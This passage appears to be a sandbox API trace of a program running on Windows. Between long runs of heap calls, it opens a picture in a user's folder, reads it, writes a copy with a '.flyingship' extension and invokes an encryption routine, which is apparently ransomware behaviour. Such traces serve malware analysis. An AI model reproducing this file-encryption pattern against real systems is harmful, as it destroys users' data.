| out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.133] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\cnlxkqk1zng.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.134] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.135] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0189.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0189.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0189.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0189.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0189.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0189.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.135] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0189.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0189.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0189.135] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0189.135] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0189.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0189.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0189.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0189.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0189.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0189.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0189.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0189.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0189.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0189.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0189.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0189.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0189.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0189.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0189.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0189.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0189.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0189.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0189.137] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat")) returned 0x10 [0189.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0189.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0189.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0189.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0189.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0189.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0189.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0189.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.139] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.flyingship.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\cnlxkqk1zng.flyingship.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0189.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0189.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0189.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0189.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0189.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0189.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.140] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0189.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0189.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0189.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0189.141] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0189.141] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0189.141] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0189.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0189.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0189.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0189.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0189.142] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0189.142] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x8f3a, lpOverlapped=0x0) returned 1 [0189.145] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0189.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0189.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0189.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8f3a) returned 0xbea018 [0189.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0189.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0189.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0189.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8f3a) returned 0xbf2f60 [0189.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0189.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.146] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0189.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0189.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8f3a) returned 0xbea018 [0189.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0189.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0189.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0189.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.147] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0189.147] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.148] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0189.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8f3a) returned 0xbea018 [0189.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0189.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0189.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0189.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0189.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0189.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0189.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0189.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8f3a) returned 0xbfbea8 [0189.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0189.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0189.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0189.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0189.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0189.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0189.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0189.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0189.150] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0189.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.150] RtlAllocateHeap 